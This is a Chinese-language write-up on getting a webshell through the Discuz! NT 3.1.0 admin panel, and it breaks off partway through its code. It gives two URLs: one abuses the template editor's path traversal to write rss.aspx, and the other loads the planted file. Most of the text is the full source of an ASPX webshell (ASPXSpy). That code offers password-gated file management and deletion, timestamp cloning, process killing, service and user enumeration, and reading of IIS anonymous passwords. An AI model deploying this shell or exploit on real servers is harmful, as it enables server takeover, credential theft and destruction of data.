Discuz! NT 3.1.0 后台拿webshell

时间:2024-02-18 12:47:56

简要描述:

通过后台写入aspx木马,直接拿到webshell,然后获取整个服务器权限。

详细说明:

1、访问http://127.0.0.1/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default,写入aspx木马。

2、写入aspx木马后,访问http://127.0.0.1/tools/rss.aspx就可以了。

 
ASPX木马:
<code><%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>

<%@ import Namespace="System.IO"%>

<%@ import Namespace="System.Diagnostics"%>

<%@ import Namespace="System.Data"%>

<%@ import Namespace="System.Management"%>

<%@ import Namespace="System.Data.OleDb"%>

<%@ import Namespace="Microsoft.Win32"%>

<%@ import Namespace="System.Net.Sockets" %>

<%@ import Namespace="System.Net" %>

<%@ import Namespace="System.Runtime.InteropServices"%>

<%@ import Namespace="System.DirectoryServices"%>

<%@ import Namespace="System.ServiceProcess"%>

<%@ import Namespace="System.Text.RegularExpressions"%>

<%@ Import Namespace="System.Threading"%>

<%@ Import Namespace="System.Data.SqlClient"%>

<%@ import Namespace="Microsoft.VisualBasic"%>

<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script runat="server">

/*

Thanks Snailsor,FuYu,BloodSword,Cnqing,

Code by Bin

Make in China

Blog: http://www.rootkit.net.cn

E-mail : master@rootkit.net.cn

*/

public string Password="21232f297a57a5a743894a0e4a801fc3";//admin

public string vbhLn="ASPXSpy";

public int TdgGU=1;

protected OleDbConnection Dtdr=new OleDbConnection();

protected OleDbCommand Kkvb=new OleDbCommand();

public NetworkStream NS=null;

public NetworkStream NS1=null;

TcpClient tcp=new TcpClient();

TcpClient zvxm=new TcpClient();

ArrayList IVc=new ArrayList();

protected void Page_load(object sender,EventArgs e)

{

YFcNP(this);

fhAEn();

if (!pdo())

{

return;

}

if(IsPostBack)

{

string tkI=Request["__EVENTTARGET"];

string VqV=Request["__File"];

if(tkI!="")

{

switch(tkI)

{

case "Bin_Parent":

krIR(Ebgw(VqV));

break;

case "Bin_Listdir":

krIR(Ebgw(VqV));

break;

case "kRXgt":

kRXgt(Ebgw(VqV));

break;

case "Bin_Createfile":

gLKc(VqV);

break;

case "Bin_Editfile":

gLKc(VqV);

break;

case "Bin_Createdir":

stNPw(VqV);

break;

case "cYAl":

cYAl(VqV);

break;

case "ksGR":

ksGR(Ebgw(VqV));

break;

case "SJv":

SJv(VqV);

break;

case "Bin_Regread":

tpRQ(Ebgw(VqV));

break;

case "hae":

hae();

break;

case "urJG":

urJG(VqV);

break;

}

if(tkI.StartsWith("dAJTD"))

{

dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);

}

else if(tkI.StartsWith("Tlvz"))

{

Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);

}

else if(tkI.StartsWith("Bin_CFile"))

{

YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);

}

}

}

else

{

PBZw();

}

}

public bool pdo()

{

if(Request.Cookies[vbhLn]==null)

{

tZSx();

return false;

}

else

{

if (Request.Cookies[vbhLn].Value != Password)

{

tZSx();

return false;

}

else

{

return true;

}

}

}

public void tZSx()

{

ljtzC.Visible=true;

ZVS.Visible=false;

}

protected void YKpI(object sender,EventArgs e)

{

Session.Abandon();

Response.Cookies.Add(new HttpCookie(vbhLn,null));

tZSx();

}

public void PBZw()

{

ZVS.Visible=true;

ljtzC.Visible=false;

Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt(\'Please input the file name:\',\'\');if(filename){Bin_PostBack(\'Bin_Createfile\',filename);}";

Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt(\'Please input the directory name:\',\'\');if(filename){Bin_PostBack(\'Bin_Createdir\',filename);}";

Bin_Button_KillMe.Attributes["onClick"]="if(confirm(\'Are you sure delete ASPXSPY?\')){Bin_PostBack(\'hae\',\'\');};";

Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";

Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();

if (AXSbb.Value==string.Empty)

{

AXSbb.Value=OElM(Server.MapPath("."));

}

Bin_H2_Title.InnerText="File Manager >>";

krIR(AXSbb.Value);

}

public void fhAEn()

{

try

{

string[] YRgt=Directory.GetLogicalDrives();

for(int i=0;i<YRgt.Length;i++)

{

Control c=ParseControl(" <asp:LinkButton Text=\'"+mFvj(YRgt[i])+"\' ID=\"Bin_Button_Driv"+i+"\" runat=\'server\' commandargument= \'"+YRgt[i]+"\'/> | ");

Bin_Span_Drv.Controls.Add(c);

LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);

nxeDR.Command+=new CommandEventHandler(this.iVk);

}

}catch(Exception ex){}

}

public string OElM(string path)

{

if(path.Substring(path.Length-1,1)!=@"\")

{

path=path+@"\";

}

return path;

}

public string nrrx(string path)

{

char[] trim={\'\\\'};

if(path.Substring(path.Length-1,1)==@"\")

{

path=path.TrimEnd(trim);

}

return path;

}

[DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]

public static extern int OMZP(string nDrive);

public string mFvj(string instr)

{

string EuXD=string.Empty;

int num=OMZP(instr);

switch(num)

{

case 1:

EuXD="Unknow("+instr+")";

break;

case 2:

EuXD="Removable("+instr+")";

break;

case 3:

EuXD="Fixed("+instr+")";

break;

case 4:

EuXD="Network("+instr+")";

break;

case 5:

EuXD="CDRom("+instr+")";

break;

case 6:

EuXD="RAM Disk("+instr+")";

break;

}

return EuXD.Replace(@"\","");

}

public string MVVJ(string instr)

{

byte[] tmp=Encoding.Default.GetBytes(instr);

return Convert.ToBase64String(tmp);

}

public string Ebgw(string instr)

{

byte[] tmp=Convert.FromBase64String(instr);

return Encoding.Default.GetString(tmp);

}

public void krIR(string path)

{

WICxe();

CzfO.Visible=true;

Bin_H2_Title.InnerText="File Manager >>";

AXSbb.Value=OElM(path);

DirectoryInfo GQMM=new DirectoryInfo(path);

if(Directory.GetParent(nrrx(path))!=null)

{

string bg=OKM();

TableRow p=new TableRow();

for(int i=1;i<6;i++)

{

TableCell pc=new TableCell();

if(i==1)

{

pc.Width=Unit.Parse("2%");

pc.Text="0";

p.CssClass=bg;

}

if(i==2)

{

pc.Text="<a href=\"javascript:Bin_PostBack(\'Bin_Parent\',\'"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"\')\">Parent Directory</a>";

}

p.Cells.Add(pc);

UGzP.Rows.Add(p);

}

}

try

{

int vLlH=0;

foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())

{

string bg=OKM();

vLlH++;

TableRow tr=new TableRow();

TableCell tc=new TableCell();

tc.Width=Unit.Parse("2%");

tc.Text="0";

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

tr.Cells.Add(tc);

TableCell HczyN=new TableCell();

HczyN.Text="<a href=\"javascript:Bin_PostBack(\'Bin_Listdir\',\'"+MVVJ(AXSbb.Value+Bin_folder.Name)+"\')\">"+Bin_folder.Name+"</a>";

tr.Cells.Add(HczyN);

TableCell LYZK=new TableCell();

LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");

tr.Cells.Add(LYZK);

UGzP.Rows.Add(tr);

TableCell ERUL=new TableCell();

ERUL.Text="--";

tr.Cells.Add(ERUL);

UGzP.Rows.Add(tr);

TableCell ZGKh=new TableCell();

ZGKh.Text="<a href=\"javascript:if(confirm(\'Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.\')){Bin_PostBack(\'kRXgt\',\'"+MVVJ(AXSbb.Value+Bin_folder.Name)+"\')};\">Del</a> | <a href=\'#\' onclick=\"var filename=prompt(\'Please input the new folder name:\',\'"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("\'","\\\'")+"\');if(filename){Bin_PostBack(\'dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"\',filename);} \">Rename</a>";

tr.Cells.Add(ZGKh);

UGzP.Rows.Add(tr);

}

TableRow cKVA=new TableRow();

cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";

cKVA.Attributes["bgcolor"]="#dddddd";

TableCell JlmW=new TableCell();

JlmW.Attributes["colspan"]="6" ;

JlmW.Attributes["height"]="5";

cKVA.Cells.Add(JlmW);

UGzP.Rows.Add(cKVA);

int aYRwo=0;

foreach(FileInfo Bin_Files in GQMM.GetFiles())

{

aYRwo++;

string gb=OKM();

TableRow tr=new TableRow();

TableCell tc=new TableCell();

tc.Width=Unit.Parse("2%");

tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=gb;

tr.Attributes["onmouseout"]="this.className=\'"+gb+"\';";

tr.Cells.Add(tc);

TableCell filename=new TableCell();

if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))

{

string url=Request.Url.ToString();

filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf(\'/\',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";

}

else

{

filename.Text=Bin_Files.Name;

}

TableCell albt=new TableCell();

albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");

TableCell YzK=new TableCell();

YzK.Text=mTG(Bin_Files.Length);

TableCell GLpi=new TableCell();

GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack(\'ksGR\',\'"+MVVJ(AXSbb.Value+Bin_Files.Name)+"\')\">Down</a> | <a href=\'#\' onclick=\"var filename=prompt(\'Please input the new path(full path):\',\'"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("\'","\\\'")+"\');if(filename){Bin_PostBack(\'Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"\',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack(\'Bin_Editfile\',\'"+Bin_Files.Name+"\')\">Edit</a> | <a href=\'#\' onclick=\"var filename=prompt(\'Please input the new file name(full path):\',\'"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("\'","\\\'")+"\');if(filename){Bin_PostBack(\'Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"\',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack(\'cYAl\',\'"+Bin_Files.Name+"\')\">Time</a> ";

tr.Cells.Add(filename);

tr.Cells.Add(albt);

tr.Cells.Add(YzK);

tr.Cells.Add(GLpi);

UGzP.Rows.Add(tr);

}

string lgb=OKM();

TableRow oWam=new TableRow();

oWam.CssClass=lgb;

for(int i=1;i<4;i++)

{

TableCell lGV=new TableCell();

if(i==1)

{

lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName(\'input\');for(var i=0;i<ck.length-1;i++){if(ck[i].type==\'checkbox\'&&ck[i].name!=\'chkall\'){ck[i].checked=forms[0].chkall.checked;}}\"/>";

}

if(i==2)

{

lGV.Text="<a href=\"#\" Onclick=\"var d_file=\'\';var ck=document.getElementsByTagName(\'input\');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!=\'chkall\'){d_file+=ck[i].name+\',\';}};if(d_file==null || d_file==\'\'){ return;} else {if(confirm(\'Are you sure delete the files ?\')){Bin_PostBack(\'SJv\',d_file)};}\">Delete selected</a>";

}

if(i==3)

{

lGV.ColumnSpan=4;

lGV.Style.Add("text-align","right");

lGV.Text=vLlH+" directories/ "+aYRwo+" files";

}

oWam.Cells.Add(lGV);

}

UGzP.Rows.Add(oWam);

}

catch(Exception error)

{

xseuB(error.Message);

}

}

public string OKM()

{

TdgGU++;

if(TdgGU % 2==0)

{

return "alt1";

}

else

{

return "alt2";

}

}

public void kRXgt(string qcKu)

{

try

{

Directory.Delete(qcKu,true);

xseuB("Directory delete new success !");

}

catch(Exception error)

{

xseuB(error.Message);

}

krIR(Directory.GetParent(qcKu).ToString());

}

public void dAJTD(string sdir,string ddir)

{

try

{

Directory.Move(sdir,ddir);

xseuB("Directory Renamed Success !");

}

catch(Exception error)

{

xseuB(error.Message);

}

krIR(AXSbb.Value);

}

public void Tlvz(string sfile,string dfile)

{

try

{

File.Move(sfile,dfile);

xseuB("File Renamed Success !");

}

catch(Exception error)

{

xseuB(error.Message);

}

krIR(AXSbb.Value);

}

public void YByN(string spath,string dpath)

{

try

{

File.Copy(spath,dpath);

xseuB("File Copy Success !");

}

catch(Exception error)

{

xseuB(error.Message);

}

krIR(AXSbb.Value);

}

public void stNPw(string path)

{

try

{

Directory.CreateDirectory(AXSbb.Value+path);

xseuB("Directory created success !");

}

catch(Exception error)

{

xseuB(error.Message);

}

krIR(AXSbb.Value);

}

public void gLKc(string path)

{

if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")

{

foreach(ListItem item in NdCX.Items)

{

if(item.Selected=true)

{

item.Selected=false;

}

}

}

Bin_H2_Title.InnerHtml="Create/ Edit File >>";

WICxe();

vrFA.Visible=true;

if(path.IndexOf(":")< 0)

{

Sqon.Value=AXSbb.Value+path;

}

else

{

Sqon.Value=path;

}

if(File.Exists(Sqon.Value))

{

StreamReader sr;

if(NdCX.SelectedItem.Text=="UTF-8")

{

sr=new StreamReader(Sqon.Value,Encoding.UTF8);

}

else

{

sr=new StreamReader(Sqon.Value,Encoding.Default);

}

Xgvv.InnerText=sr.ReadToEnd();

sr.Close();

}

else

{

Xgvv.InnerText=string.Empty;

}

}

public void ksGR(string path)

{

FileInfo fs=new FileInfo(path);

Response.Clear();

Page.Response.ClearHeaders();

Page.Response.Buffer=false;

this.EnableViewState=false;

Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));

Response.AddHeader("Content-Length",fs.Length.ToString());

Page.Response.ContentType="application/unknown";

Response.WriteFile(fs.FullName);

Page.Response.Flush();

Page.Response.Close();

Response.End();

Page.Response.Clear();

}

public void SJv(string path)

{

try

{

string[] spdT=path.Split(\',\');

for(int i=0;i<spdT.Length-1;i++)

{

File.Delete(AXSbb.Value+Ebgw(spdT[i]));

}

xseuB("File Delete Success !");

}

catch(Exception error)

{

xseuB(error.Message);

}

krIR(AXSbb.Value);

}

public void hae()

{

try

{

File.Delete(Request.PhysicalPath);

Response.Redirect("http://www.rootkit.net.cn");

}

catch(Exception error)

{

xseuB(error.Message);

}

}

public void cYAl(string path)

{

Bin_H2_Title.InnerHtml="Clone file was last modified time >>";

WICxe();

zRyG.Visible=true;

QiFB.Value=AXSbb.Value+path;

lICp.Value=AXSbb.Value;

pWVL.Value=AXSbb.Value+path;

string Att=File.GetAttributes(QiFB.Value).ToString();

if(Att.LastIndexOf("ReadOnly")!=-1)

{

ZhWSK.Checked=true;

}

if(Att.LastIndexOf("System")!=-1)

{

SsR.Checked=true;

}

if(Att.LastIndexOf("Hidden")!=-1)

{

ccB.Checked=true;

}

if(Att.LastIndexOf("Archive")!=-1)

{

fbyZ.Checked=true;

}

yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();

uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();

aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();

}

public static String mTG(Int64 fileSize)

{

if(fileSize<0)

{

throw new ArgumentOutOfRangeException("fileSize");

}

else if(fileSize >= 1024 * 1024 * 1024)

{

return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));

}

else if(fileSize >= 1024 * 1024)

{

return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));

}

else if(fileSize >= 1024)

{

return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);

}

else

{

return string.Format("{0} B",fileSize);

}

}

private bool SGde(string sSrc)

{

Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");

if(reg.IsMatch(sSrc))

{

return true;

}

else

{

return false;

}

}

public void AdCx()

{

string qcKu=string.Empty;

string mWGEm="IIS://localhost/W3SVC";

GlI.Style.Add("word-break","break-all");

try

{

DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);

int fmW=0;

foreach(DirectoryEntry child in HHzcY.Children)

{

if(SGde(child.Name.ToString()))

{

fmW++;

DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());

DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");

string bg=OKM();

TableRow TR=new TableRow();

TR.Attributes["onmouseover"]="this.className=\'focus\';";

TR.CssClass=bg;

TR.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();

for(int i=1;i<6;i++)

{

try

{

TableCell tfit=new TableCell();

switch(i)

{case 1:

tfit.Text=fmW.ToString();

break;

case 2:

tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();

break;

case 3:

tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();

break;

case 4:

StringBuilder sb=new StringBuilder();

PropertyValueCollection pc=child.Properties["ServerBindings"];

for (int j=0; j < pc.Count; j++)

{

sb.Append(pc[j].ToString()+"<br>");

}

tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);

break;

case 5:

tfit.Text="<a href=\"javascript:Bin_PostBack(\'Bin_Listdir\',\'"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"\')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";

break;

}

TR.Cells.Add(tfit);

}

catch (Exception ex)

{

xseuB(ex.Message);

continue;

}

}

GlI.Controls.Add(TR);

}

}

}

catch(Exception ex)

{

xseuB(ex.Message);

}

}

public ManagementObjectCollection PhQTd(string query)

{

ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));

return QS.Get();

}

public DataTable cCf(string query)

{

DataTable dt=new DataTable();

int i=0;

ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));

try

{

foreach(ManagementObject m in QS.Get())

{

DataRow dr=dt.NewRow();

PropertyDataCollection.PropertyDataEnumerator oEnum;

oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);

while(oEnum.MoveNext())

{

PropertyData DRU=(PropertyData)oEnum.Current;

if(dt.Columns.IndexOf(DRU.Name)==-1)

{

dt.Columns.Add(DRU.Name);

dt.Columns[dt.Columns.Count-1].DefaultValue="";

}

if(m[DRU.Name]!=null)

{

dr[DRU.Name]=m[DRU.Name].ToString();

}

else

{

dr[DRU.Name]=string.Empty;

}

}

dt.Rows.Add(dr);

}

}

catch(Exception error)

{

}

return dt;

}

public void YUw()

{

try

{

Bin_H2_Title.InnerText="Process >>";

WICxe();

DCbS.Visible=true;

int UEbTI=0;

Process[] p=Process.GetProcesses();

foreach(Process sp in p)

{

UEbTI++;

string bg=OKM();

TableRow tr=new TableRow();

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

for(int i=1;i<7;i++)

{

TableCell td=new TableCell();

if(i==1)

{

td.Width=Unit.Parse("2%");

td.Text=UEbTI.ToString();

tr.Controls.Add(td);

}

if(i==2)

{

td.Text=sp.Id.ToString();

tr.Controls.Add(td);

}

if(i==3)

{

td.Text=sp.ProcessName.ToString();

tr.Controls.Add(td);

}

if(i==4)

{

td.Text=sp.Threads.Count.ToString();

tr.Controls.Add(td);

}

if(i==5)

{

td.Text=sp.BasePriority.ToString();

tr.Controls.Add(td);

}

if(i==6)

{

td.Text="--";

tr.Controls.Add(td);

}

}

IjsL.Controls.Add(tr);

}

}

catch(Exception error)

{

AIz();

}

AIz();

}

public void AIz()

{

try

{

Bin_H2_Title.InnerText="Process >>";

WICxe();

DCbS.Visible=true;

int UEbTI=0;

DataTable dt=cCf("Win32_Process");

for(int j=0;j<dt.Rows.Count;j++)

{

UEbTI++;

string bg=OKM();

TableRow tr=new TableRow();

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

for(int i=1;i<7;i++)

{

TableCell td=new TableCell();

if(i==1)

{

td.Width=Unit.Parse("2%");

td.Text=UEbTI.ToString();

tr.Controls.Add(td);

}

if(i==2)

{

td.Text=dt.Rows[j]["ProcessID"].ToString();

tr.Controls.Add(td);

}

if(i==3)

{

td.Text=dt.Rows[j]["Name"].ToString();

tr.Controls.Add(td);

}

if(i==4)

{

td.Text=dt.Rows[j]["ThreadCount"].ToString();

tr.Controls.Add(td);

}

if(i==5)

{

td.Text=dt.Rows[j]["Priority"].ToString();

tr.Controls.Add(td);

}

if(i==6)

{

if( dt.Rows[j]["CommandLine"]!=string.Empty)

{

td.Text="<a href=\"javascript:Bin_PostBack(\'urJG\',\'"+dt.Rows[j]["ProcessID"].ToString()+"\')\">Kill</a>";

}

else

{

td.Text="--";

}

tr.Controls.Add(td);

}

}

IjsL.Controls.Add(tr);

}

}

catch(Exception error)

{

xseuB(error.Message);

}

}

public void urJG(string pid)

{

try

{

foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID =\'"+pid+"\'"))

{

p.InvokeMethod("Terminate",null);

p.Dispose();

}

xseuB("Process Kill Success !");

}

catch(Exception error)

{

xseuB(error.Message);

}

AIz();

}

public void oHpF()

{

try

{

Bin_H2_Title.InnerText="Services >>";

WICxe();

iQxm.Visible=true;

int UEbTI=0;

ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();

for(int i=0;i<kQmRu.Length;i++)

{

UEbTI++;

string bg=OKM();

TableRow tr=new TableRow();

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

for(int b=1;b<7;b++)

{

TableCell td=new TableCell();

if(b==1)

{

td.Width=Unit.Parse("2%");

td.Text=UEbTI.ToString();

tr.Controls.Add(td);

}

if(b==2)

{

td.Text="null";

tr.Controls.Add(td);

}

if(b==3)

{

td.Text=kQmRu[i].ServiceName.ToString();

tr.Controls.Add(td);

}

if(b==4)

{

td.Text="";

tr.Controls.Add(td);

}

if(b==5)

{

string kOIo=kQmRu[i].Status.ToString();

if(kOIo=="Running")

{

td.Text="<font color=green>"+kOIo+"</font>";

}

else

{

td.Text="<font color=red>"+kOIo+"</font>";

}

tr.Controls.Add(td);

}

if(b==6)

{

td.Text="";

tr.Controls.Add(td);

}

}

vHCs.Controls.Add(tr);

}

}

catch(Exception error)

{

xseuB(error.Message);

}

}

public void tZRH()

{

try

{

Bin_H2_Title.InnerText="Services >>";

WICxe();

iQxm.Visible=true;

int UEbTI=0;

DataTable dt=cCf("Win32_Service");

for(int j=0;j<dt.Rows.Count;j++)

{

UEbTI++;

string bg=OKM();

TableRow tr=new TableRow();

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();

for(int i=1;i<7;i++)

{

TableCell td=new TableCell();

if(i==1)

{

td.Width=Unit.Parse("2%");

td.Text=UEbTI.ToString();

tr.Controls.Add(td);

}

if(i==2)

{

td.Text=dt.Rows[j]["ProcessID"].ToString();

tr.Controls.Add(td);

}

if(i==3)

{

td.Text=dt.Rows[j]["Name"].ToString();

tr.Controls.Add(td);

}

if(i==4)

{

td.Text=dt.Rows[j]["PathName"].ToString();

tr.Controls.Add(td);

}

if(i==5)

{

string kOIo=dt.Rows[j]["State"].ToString();

if(kOIo=="Running")

{

td.Text="<font color=green>"+kOIo+"</font>";

}

else

{

td.Text="<font color=red>"+kOIo+"</font>";

}

tr.Controls.Add(td);

}

if(i==6)

{

td.Text=dt.Rows[j]["StartMode"].ToString();

tr.Controls.Add(td);

}

}

vHCs.Controls.Add(tr);

}

}

catch(Exception error)

{

oHpF();

}

}

public void PLd()

{

try

{

WICxe();

xWVQ.Visible=true;

Bin_H2_Title.InnerText="User Information >>";

DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());

foreach(DirectoryEntry child in TWQ.Children)

{

foreach(string name in child.Properties.PropertyNames)

{

PropertyValueCollection pvc=child.Properties[name];

int c=pvc.Count;

for(int i=0;i<c;i++)

{

if(name!="objectSid" && name!="Parameters" && name!="LoginHours")

{

string bg=OKM();

TableRow tr=new TableRow();

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

TableCell td=new TableCell();

td.Text=name;

tr.Controls.Add(td);

TableCell td1=new TableCell();

td1.Text=pvc[i].ToString();

tr.Controls.Add(td1);

VPa.Controls.Add(tr);

}

}

}

TableRow trn=new TableRow();

for(int x=1;x<3;x++)

{

TableCell tdn=new TableCell();

tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";

trn.Controls.Add(tdn);

VPa.Controls.Add(trn);

}

}

}

catch(Exception error)

{

xseuB(error.Message);

}

}

public void iLVUT()

{

try

{

WICxe();

xWVQ.Visible=true;

Bin_H2_Title.InnerText="User Information >>";

DataTable user=cCf("Win32_UserAccount");

for(int i=0;i<user.Rows.Count;i++)

{

for(int j=0;j<user.Columns.Count;j++)

{

string bg=OKM();

TableRow tr=new TableRow();

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

TableCell td=new TableCell();

td.Text=user.Columns[j].ToString();

tr.Controls.Add(td);

TableCell td1=new TableCell();

td1.Text=user.Rows[i][j].ToString();

tr.Controls.Add(td1);

VPa.Controls.Add(tr);

}

TableRow trn=new TableRow();

for(int x=1;x<3;x++)

{

TableCell tdn=new TableCell();

tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";

trn.Controls.Add(tdn);

VPa.Controls.Add(trn);

}

}

}

catch(Exception error)

{

PLd();

}

}

public void pDVM()

{

try

{

RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");

string IKjwH=DdmPl(EeZ,"PortNumber");

RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");

int cpu=izN.SubKeyCount;

RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");

string NPPZ=DdmPl(mQII,"ProcessorNameString");

WICxe();

ghaB.Visible=true;

Bin_H2_Title.InnerText="System Information >>";

Bin_H2_Mac.InnerText="MAC Information >>";

Bin_H2_Driver.InnerText="Driver Information >>";

StringBuilder yEwc=new StringBuilder();

StringBuilder hwJeS=new StringBuilder();

StringBuilder jXkaE=new StringBuilder();

yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");

yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");

yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");

yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");

yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");

yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");

yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");

yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");

DataTable BIOS=cCf("Win32_BIOS");

yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");

yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");

yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");

DataTable upM=cCf("Win32_PhysicalMemory");

Int64 oZnZV=0;

for(int i=0;i<upM.Rows.Count;i++)

{

oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());

}

yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");

DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");

for(int i=0;i<dOza.Rows.Count;i++)

{

hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");

if(dOza.Rows[i]["MACAddress"]!=string.Empty)

{

hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");

}

}

DataTable Driver=cCf("Win32_SystemDriver");

for (int i=0; i<Driver.Rows.Count; i++)

{

